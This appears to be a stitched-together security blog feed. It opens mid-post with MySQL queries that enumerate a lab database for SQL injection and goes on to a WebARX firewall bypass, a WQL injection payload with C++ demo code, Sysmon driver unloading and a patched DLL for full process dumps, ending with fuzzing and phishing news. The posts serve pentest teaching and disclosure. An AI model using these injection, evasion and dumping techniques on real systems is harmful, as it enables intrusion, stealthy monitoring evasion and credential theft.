| @@datadir\security\users.frm    |
| @@datadir\security\users.ibd    |
| @@datadir\security\uagents.frm  |
| @@datadir\security\db.opt       |
+---------------------------------+

mysql> SELECT FILE FROM `sys`.`x$io_global_by_file_by_bytes` WHERE FILE REGEXP DATABASE();
+-----------------------------------------------------------------------------+
| file                                                                        |
+-----------------------------------------------------------------------------+
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\emails.ibd   |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\flag.ibd     |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\referers.ibd |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\uagents.ibd  |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\users.ibd    |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\uagents.frm  |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\referers.frm |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\users.frm    |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\emails.frm   |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\flag.frm     |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\db.opt       |
+-----------------------------------------------------------------------------+

mysql> SELECT FILE FROM `sys`.`x$io_global_by_file_by_latency` WHERE FILE REGEXP DATABASE();
+-----------------------------------------------------------------------------+
| file                                                                        |
+-----------------------------------------------------------------------------+
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\flag.ibd     |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\uagents.ibd  |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\flag.frm     |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\emails.frm   |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\emails.ibd   |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\referers.ibd |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\referers.frm |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\users.frm    |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\users.ibd    |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\uagents.frm  |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\db.opt       |
+-----------------------------------------------------------------------------+
11 rows in set (0.00 sec)

The following tables store the queries used before like a log. You can use regular expressions to find what you need.

mysql> SELECT QUERY FROM sys.x$statement_analysis WHERE QUERY REGEXP DATABASE();
+-----------------------------------------------------------------------------------------------------------------------------------+
| query                                                                                                                             |
+-----------------------------------------------------------------------------------------------------------------------------------+
| SHOW TABLE STATUS FROM `security`                                                                                                 |
| SHOW CREATE TABLE `security` . `emails`                                                                                           |
| SHOW CREATE TABLE `security` . `users`                                                                                            |
| SHOW CREATE TABLE `security` . `referers`                                                                                         |
+-----------------------------------------------------------------------------------------------------------------------------------+

mysql> SELECT QUERY FROM `sys`.`statement_analysis` where QUERY REGEXP DATABASE();
+-----------------------------------------------------------+
| query                                                     |
+-----------------------------------------------------------+
| SHOW TABLE STATUS FROM `security`                         |
| SHOW CREATE TABLE `security` . `emails`                   |
| SHOW CREATE TABLE `security` . `users`                    |
| SHOW CREATE TABLE `security` . `referers`                 |
| SELECT * FROM `security` . `users` LIMIT ?                |
| SHOW CREATE TABLE `security` . `uagents`                  |
| SHOW CREATE PROCEDURE `security` . `select_first_column`  |
| SHOW CREATE TABLE `security` . `users`                    |
| SHOW OPEN TABLES FROM `security` WHERE `in_use` != ?      |
| SHOW TRIGGERS FROM `security`                             |
| USE `security`                                            |
| USE `security`                                            |
+-----------------------------------------------------------+
12 rows in set (0.01 sec)

Performance_Schema

mysql> SELECT object_name FROM `performance_schema`.`objects_summary_global_by_type` WHERE object_schema = DATABASE();
+---------------------+
| object_name         |
+---------------------+
| emails              |
| referers            |
| uagents             |
| users               |
| flag                |
| select_first_column |
+---------------------+
6 rows in set (0.00 sec)

mysql> SELECT object_name FROM `performance_schema`.`table_handles` WHERE object_schema = DATABASE();
+-------------+
| object_name |
+-------------+
| emails      |
| referers    |
| uagents     |
| users       |
| users       |
| users       |
| users       |
| users       |
| users       |
| users       |
| emails      |
| flag        |
| referers    |
| uagents     |
| users       |
| emails      |
| flag        |
| referers    |
| uagents     |
| users       |
+-------------+
20 rows in set (0.00 sec)

mysql> SELECT object_name FROM `performance_schema`.`table_io_waits_summary_by_index_usage` WHERE object_schema = DATABASE();
+-------------+
| object_name |
+-------------+
| emails      |
| referers    |
| uagents     |
| users       |
| users       |
| flag        |
+-------------+
6 rows in set (0.00 sec)

mysql> SELECT object_name FROM `performance_schema`.`table_io_waits_summary_by_table` WHERE object_schema = DATABASE();
+-------------+
| object_name |
+-------------+
| emails      |
| referers    |
| uagents     |
| users       |
| flag        |
+-------------+
5 rows in set (0.00 sec)

mysql> SELECT object_name FROM `performance_schema`.`table_lock_waits_summary_by_table` WHERE object_schema = DATABASE();
+-------------+
| object_name |
+-------------+
| emails      |
| referers    |
| uagents     |
| users       |
| flag        |
+-------------+
5 rows in set (0.00 sec)

As mentioned before the following contains the log of all typed SQL queries. Sometimes you might find table names. For simplicity, I have used regular expressions to match the current database name.

mysql> SELECT digest_text FROM `performance_schema`.`events_statements_summary_by_digest` WHERE digest_text REGEXP DATABASE();
+-----------------------------------------------------------------------------------------------------------------------------------+
| digest_text                                                                                                                       |
+-----------------------------------------------------------------------------------------------------------------------------------+
| SHOW CREATE TABLE `security` . `emails`                                                                                           |
| SHOW CREATE TABLE `security` . `referers`                                                                                         |
| SHOW CREATE PROCEDURE `security` . `select_first_column`                                                                          |
| SHOW CREATE TABLE `security` . `uagents`                                                                                          |
+-----------------------------------------------------------------------------------------------------------------------------------+
17 rows in set (0.00 sec)

Like before we are fetching the local table file paths.

mysql> SELECT file_name FROM `performance_schema`.`file_instances` WHERE file_name REGEXP DATABASE();
+-----------------------------------------------------------------------------+
| file_name                                                                   |
+-----------------------------------------------------------------------------+
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\emails.ibd   |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\flag.ibd     |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\referers.ibd |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\uagents.ibd  |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\users.ibd    |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\emails.frm   |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\referers.frm |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\db.opt       |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\uagents.frm  |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\users.frm    |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\flag.frm     |
+-----------------------------------------------------------------------------+
11 rows in set (0.00 sec)

mysql> SELECT file_name FROM `performance_schema`.`file_summary_by_instance` WHERE file_name REGEXP DATABASE();
+-----------------------------------------------------------------------------+
| file_name                                                                   |
+-----------------------------------------------------------------------------+
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\emails.ibd   |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\flag.ibd     |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\referers.ibd |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\uagents.ibd  |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\users.ibd    |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\emails.frm   |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\referers.frm |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\db.opt       |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\uagents.frm  |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\users.frm    |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\flag.frm     |
+-----------------------------------------------------------------------------+
11 rows in set (0.00 sec)

MySQL

mysql> SELECT table_name FROM `mysql`.`innodb_table_stats` WHERE database_name = DATABASE();
+------------+
| table_name |
+------------+
| emails     |
| flag       |
| referers   |
| uagents    |
| users      |
+------------+
5 rows in set (0.00 sec)

mysql> SELECT table_name FROM `mysql`.`innodb_index_stats` WHERE database_name = DATABASE();
+------------+
| table_name |
+------------+
| emails     |
| emails     |
| emails     |
| flag       |
| flag       |
| flag       |
| referers   |
| referers   |
| referers   |
| uagents    |
| uagents    |
| uagents    |
| users      |
| users      |
| users      |
+------------+
15 rows in set (0.00 sec)

Information_Schema

mysql> SELECT TABLE_NAME FROM `information_schema`.`KEY_COLUMN_USAGE` WHERE CONSTRAINT_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| emails     |
| flag       |
| referers   |
| uagents    |
| users      |
+------------+
5 rows in set (0.07 sec)

mysql> SELECT TABLE_NAME FROM `information_schema`.`KEY_COLUMN_USAGE` WHERE table_schema = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| emails     |
| flag       |
| referers   |
| uagents    |
| users      |
+------------+
5 rows in set (0.00 sec)

However, the first column value can be retrieved in this case.

mysql> SELECT COLUMN_NAME FROM `information_schema`.`KEY_COLUMN_USAGE` WHERE table_schema = DATABASE();
+-------------+
| COLUMN_NAME |
+-------------+
| id          |
| id          |
| id          |
| id          |
| id          |
+-------------+
5 rows in set (0.00 sec)

mysql> SELECT TABLE_NAME FROM `information_schema`.`PARTITIONS` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| emails     |
| flag       |
| referers   |
| uagents    |
| users      |
+------------+
5 rows in set (0.01 sec)

In this table, you can also use the column ‘column_name’ to get the first column of all tables.

mysql> SELECT TABLE_NAME FROM `information_schema`.`STATISTICS` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| emails     |
| flag       |
| referers   |
| uagents    |
| users      |
+------------+
5 rows in set (0.00 sec)

mysql> SELECT TABLE_NAME FROM `information_schema`.`TABLE_CONSTRAINTS` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| emails     |
| flag       |
| referers   |
| uagents    |
| users      |
+------------+
5 rows in set (0.00 sec)

mysql> SELECT file_name FROM `information_schema`.`FILES` where file_name regexp database();
+-------------------------+
| file_name               |
+-------------------------+
| .\security\emails.ibd   |
| .\security\flag.ibd     |
| .\security\referers.ibd |
| .\security\uagents.ibd  |
| .\security\users.ibd    |
+-------------------------+
5 rows in set (0.00 sec)

Starting from MySQL 5.6 InnoDB exists in Information_Schema.

mysql> SELECT TABLE_NAME FROM `information_schema`.`INNODB_BUFFER_PAGE` WHERE TABLE_NAME REGEXP  DATABASE();
+-----------------------+
| TABLE_NAME            |
+-----------------------+
| `security`.`emails`   |
| `security`.`referers` |
| `security`.`uagents`  |
| `security`.`users`    |
| `security`.`flag`     |
+-----------------------+

mysql> SELECT TABLE_NAME FROM `information_schema`.`INNODB_BUFFER_PAGE_LRU` WHERE TABLE_NAME REGEXP DATABASE();
+-----------------------+
| TABLE_NAME            |
+-----------------------+
| `security`.`emails`   |
| `security`.`referers` |
| `security`.`uagents`  |
| `security`.`users`    |
| `security`.`flag`     |
+-----------------------+
5 rows in set (0.06 sec)

mysql> SELECT path FROM  `information_schema`.`INNODB_SYS_DATAFILES` WHERE path REGEXP DATABASE();
+-------------------------+
| path                    |
+-------------------------+
| .\security\users.ibd    |
| .\security\emails.ibd   |
| .\security\uagents.ibd  |
| .\security\referers.ibd |
| .\security\flag.ibd     |
+-------------------------+
5 rows in set (0.00 sec)

mysql> SELECT NAME FROM `information_schema`.`INNODB_SYS_TABLESPACES` WHERE NAME REGEXP DATABASE();
+-------------------+
| NAME              |
+-------------------+
| security/users    |
| security/emails   |
| security/uagents  |
| security/referers |
| security/flag     |
+-------------------+
5 rows in set (0.04 sec)

mysql> SELECT NAME FROM `information_schema`.`INNODB_SYS_TABLESTATS` WHERE NAME REGEXP DATABASE();
+-------------------+
| NAME              |
+-------------------+
| security/emails   |
| security/flag     |
| security/referers |
| security/uagents  |
| security/users    |
+-------------------+
5 rows in set (0.00 sec)

Column Names

Most of the time people ask me if there’s any method to extract column names? You don’t need to know the column names really.

If you have the error displayed you can straightaway get the number of columns using the below first query which makes the query equals to 1 returning us the error. To determine the number of columns in a boolean blind injection scenario you can do this trick which will return 0 (since the values aren’t equal). After that use the below third query to extract data 🙂

I hope these might come handy in your next pentest 🙂

Bypassing the WebARX Web Application Firewall (WAF)

12 October 2019 at 22:16

WebARX is a web application firewall where you can protect your website from malicious attacks. As you can see it was mentioned in TheHackerNews as well and has good ratings if you do some Googling.
https://thehackernews.com/2019/09/webarx-web-application-security.html

It was found out that the WebARX WAF could be easily bypassed by passing a whitelist string. As you see the request won’t be processed by the WAF if it detects a whitelist string.

Let’s first try on their own website. This is a simple LFi payload.



Now if I include a whitelist string such as ithemes-sync-request it would be easily bypassed.

XSS PoC

Here’s an XSS PoC where we pass a simple script tag. It detects the raw request when we pass normally.

But if we include ithemes-sync-request parameter which is a whitelist string the script tag will get executed.

LFi PoC

Here’s a normal payload which will block.

Once we apply the whitelist string it’s bypassed.

SQLi PoC

Here’s a normal payload which will block.

Once we apply the whitelist string it’s bypassed.

These whitelist strings are more like a kill switch for this firewall. I’m not quite sure the developers of this project understands the logic behind it. It’s more like coded by an amateur programmer for a university assignment.

[tweet https://twitter.com/webarx_security/status/1181655018442760193]

WQL Injection

6 October 2019 at 21:59

Generally in application security, the user input must be sanitized. When it comes to SQL injection the root cause most of the time is because the input not being sanitized properly. I was curious about Windows Management Instrumentation Query Language – WQL which is the SQL for WMI. Can we abuse WQL if the input is not sanitized?

I wrote a simple application in C++ which gets the service information from the Win32_Service class. It will display members such as Name, ProcessId, PathName, Description, etc.

This is the WQL Query.

SELECT * FROM win32_service where Name='User Input'

As you can see I am using the IWbemServices::ExecQuery method to execute the query and enumerte its members using the IEnumWbemClassObject::Next method.

BSTR input = L"SELECT * FROM win32_service where Name='User Input'";

if (FAILED(hRes = pService->ExecQuery(L"WQL", input, WBEM_FLAG_FORWARD_ONLY, NULL, &pEnumerator))) {
	pLocator->Release();
	pService->Release();
	cout << "Unable to retrive Services: 0x" << std::hex << hRes << endl;
	return 1;
}

IWbemClassObject* clsObj = NULL;
int numElems;
while ((hRes = pEnumerator->Next(WBEM_INFINITE, 1, &clsObj, (ULONG*)&numElems)) != WBEM_S_FALSE) {
	if (FAILED(hRes)) break;
	VARIANT vRet;
	VariantInit(&vRet);
	if (SUCCEEDED(clsObj->Get(L"Name", 0, &vRet, NULL, NULL))
		&& vRet.vt == VT_BSTR) {
		wcout << L"Name: " << vRet.bstrVal << endl;
		VariantClear(&vRet);
}

Once the user enters a service name the application will display its members.

I was thinking if it’s possible to make the query true and return all the services of the target host. Something like id=1 or 1=1 in SQLi where we make the statement logically true.
Since the user input is not properly sanitized in this case we can use the and keyword and enumerate all the services by using the like keyword.

SELECT * FROM win32_service where Name='Appinfo' or name like '[^]%'

You could simply use “%” as well.

This is just a simple demonstration to prove WQL injection. I’m sure there might be better cases to demonstrate this. However, Extended WQL which is a superset of the WQL can be used to combine statements and do more cool stuff. It’s used by the System Center Configuration Manager – SCCM. Always sanitize the input of the application.

You can download the applications from here to play around.
https://github.com/OsandaMalith/WMI/releases/download/1/WinServiceInfo.7z

Unloading the Sysmon Minifilter Driver

22 September 2019 at 14:51

The binary fltMC.exe is used to manage minifilter drivers. You can easily load and unload minifilters using this binary. To unload the Sysmon driver you can use:

fltMC unload SysmonDrv

If this binary is flagged, we can unload the minifilter driver by calling the ‘FilterUnload’ which is the Win32 equivalent of ‘FltUnloadFilter’. It will call the minifilter’s ‘FilterUnloadCallback’ (PFLT_FILTER_UNLOAD_CALLBACK) routine. This is as same as using fltMC which is a Non-mandatory unload.
For calling this API SeLoadDriverPrivilege is required. To obtain this privelege adminsitrative permissions are required.

Here’s a simple C code I wrote to call the ‘FilterUnload’ API.

https://github.com/OsandaMalith/WindowsInternals/blob/master/Unload_Minifilter.c

[gist https://gist.github.com/OsandaMalith/3315bc640ff51227ab067052bc20a445]

Note that when unloading a minifilter driver by the FilterManager, it will be logged under the System log.

References:
https://www.osr.com/nt-insider/2017-issue2/introduction-standard-isolation-minifilters/

MiniDumpWriteDump via Faultrep!CreateMinidump

8 September 2019 at 21:18

I found out this old undocumented API “CreateMinidumpW” inside the faultrep.dll on Windows XP and Windows Server 2003. This API ends up calling the dbghelp!MiniDumpWriteDump to dump the process by dynamically loading the dbghelp.dll on runtime.

The function takes 3 arguments. I really have no clue what this 3rd argument’s structure is. I passed 0 as the pointer to the structure so by default we end up getting 0x21 as the MINIDUMP_TYPE.

CreateMinidumpW(DWORD dwProcessId, LPCWSTR lpFileName, struct tagSMDumpOptions *)



This is the call stack

[email protected]
faultrep.dll!InternalGenerateMinidumpEx(void *,unsigned long,void *,struct tagSMDumpOptions *,unsigned short const *,int)	
faultrep.dll!InternalGenerateMinidump(void *,unsigned long,unsigned short const *,struct tagSMDumpOptions *,int)	
faultrep.dll!CreateMinidumpW(unsigned long,unsigned short const *,struct tagSMDumpOptions *)

As you see it calls the dbghelp!MiniDumpWriteDump by loading the dbghelp.dll using the LoadLibraryExW API.

However, this function ‘faultrep.dll!InternalGenerateMinidumpEx’ doesn’t provide a full dump. As you can see it passes 0x21 or it compares the 3rd argument which is a structure and based on that value it passes 0x325.

0x21 = MiniDumpWithDataSegs | MiniDumpWithUnloadedModules	

0x325 = MiniDumpWithDataSegs | MiniDumpWithHandleData | MiniDumpWithPrivateReadWriteMemory | MiniDumpWithProcessThreadData | MiniDumpWithUnloadedModules

What you could do is, patch it to a 0x2 to make it a ‘MiniDumpWithFullMemory’. You can find the 64-bit version of the patched DLL from here https://github.com/OsandaMalith/WindowsInternals/tree/master/CreateMinidump

This is the PoC of calling this API. You can copy the DLL from Windows XP and it will work fine. Not sure how this is useful. Just sharing what I found 🙂

[gist https://gist.github.com/OsandaMalith/087947635eb47a5d92c1d0b1df0414eb]

UPDATE: I wrote a hot patch for both 32-bit and 64-bit faultrep DLLs. It will allow you to get a full process dump passing MiniDumpWithFullMemory as the MINIDUMP_TYPE. Tested on Windows XP 32-bit and 64-bit. On other systems by copying the original DLLs in the same folder will work fine. You can find the repo with DLL files from here https://github.com/OsandaMalith/WindowsInternals/tree/master/CreateMinidump/Hot%20Patch

[gist https://gist.github.com/OsandaMalith/a39f22e99e0b21ccd68d1c4702346d5e]

Some uses 😉
[tweet https://twitter.com/m3g9tr0n/status/1171462911388028931]

ClusterFuzzLite - Simple Continuous Fuzzing That Runs In CI

3 December 2021 at 11:30
By: Zion3R


ClusterFuzzLite is a continuous fuzzing solution that runs as part of Continuous Integration (CI) workflows to find vulnerabilities faster than ever before. With just a few lines of code, GitHub users can integrate ClusterFuzzLite into their workflow and fuzz pull requests to catch bugs before they are committed.

ClusterFuzzLite is based on ClusterFuzz.


Features

  • Quick code change (pull request) fuzzing to find bugs before they land
  • Downloads of crashing testcases
  • Continuous longer running fuzzing (batch fuzzing) to asynchronously find deeper bugs missed during code change fuzzing and build a corpus for use in code change fuzzing
  • Coverage reports showing which parts of your code are fuzzed
  • Modular functionality, so you can decide which features you want to use


Supported Languages

  • C
  • C++
  • Java (and other JVM-based languages)
  • Go
  • Python
  • Rust
  • Swift

Supported CI Systems

  • GitHub Actions
  • Google Cloud Build
  • Prow
  • Support for more CI systems is in-progess, and extending support to other CI systems is easy

Documentation

Read our detailed documentation to learn how to use ClusterFuzzLite.

Staying in touch

Join our mailing list for announcements and discussions.

If you use ClusterFuzzLite, please fill out this form so we know who is using it. This gives us an idea of the impact of ClusterFuzzLite and allows us to justify future work.

Feel free to file an issue if you experience any trouble or have feature requests.



New Malvertising Campaigns Spreading Backdoors, Malicious Chrome Extensions

3 December 2021 at 10:59
A series of malicious campaigns have been leveraging fake installers of popular apps and games such as Viber, WeChat, NoxPlayer, and Battlefield as a lure to trick users into downloading a new backdoor and an undocumented malicious Google Chrome extension with the goal of stealing credentials and data stored in the compromised systems as well as maintaining persistent remote access. Cisco Talos

Why Everyone Needs to Take the Latest CISA Directive Seriously

3 December 2021 at 09:23
Government agencies publish notices and directives all the time. Usually, these are only relevant to government departments, which means that nobody else really pays attention. It's easy to see why you would assume that a directive from CISA just doesn't relate to your organization. But, in the instance of the latest CISA directive, that would be making a mistake. In this article, we explain why

Watch out for Omicron COVID-19-themed phishing messages!

3 December 2021 at 08:45

Threat actors have started to exploit the interest in the Omicron COVID-19 variant and are using it as a lure in phishing campaigns.

Crooks have already started exploiting the interest in the Omicron COVID-19 variant and are using it as a lure in phishing attacks.

People are interested in the spreading of the new variant, the efficiency of the vaccines and the measures that will adopt the states to prevent its spreading, and threat actors are attempting to take advantage of this situation.

An Omicron COVID-19 campaign was spotted by UK authorities and the National Health Service (NHS) is warning about the Omicron COVID-19-themed phishing attacks.

⚠ SCAM OMICRON PCR EMAILS ⚠

Beware of fake NHS emails asking you to order a Omicron PCR test.

Link goes to a fake NHS website.

The NHS will:

❌NEVER ask for payment – the vaccine is free
❌NEVER ask for your bank details

Forward emails to [email protected] pic.twitter.com/GcGB3C5dLI

— Norfolk County Council Trading Standards (@NorfolkCCTS) November 30, 2021

@ukhsa advise of a #SCAM doing the rounds on social media purporting to offer #Omicron #PCRs #tscovid19

This has been reported & will be taken down but it is likely there will be more instances before it is removed, & there are reports of people querying it at test sites. pic.twitter.com/IXZ1qPStq5

— Dudley EHO – Play your part – #protectDudley (@myDudleyEHO) December 1, 2021

These phishing messages offer a free Omicron PCR test that will allegedly allow recipients to avoid restrictions. One of the samples shared by UK’s consumer protection organization ‘Which?’ and published by BleepingComputer were sent by the email ‘[email protected]’ in the attempt to make emails more credible.

Upon clicking on the link embedded into the message, recipients are redirected to a fake NHS website where to apply for a “COVID-19 Omicron PCR test.”

The recipients have to fill a form with their data (name, date of birth, home address, mobile phone number, and email address), some security questions (i.e. mother’s maiden name), and finalize the procedure by making a payment of £1.24 ($1.65).

Clearly, the scammers aim at stealing the payment details of the recipients while making the payment.

Authorities are urging the citizens to be aware of suspicious emails or text messages that may be asking for financial details (i.e. credit card data, banking data). The NHS never asks for financial details in legitimate email correspondence.

“The NHS will: NEVER ask for payment – the vaccine is free NEVER ask for your bank details.”

Users that will receive suspicious messages can report them at “[email protected]”.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Omicron COVID-19)

The post Watch out for Omicron COVID-19-themed phishing messages! appeared first on Security Affairs.

❌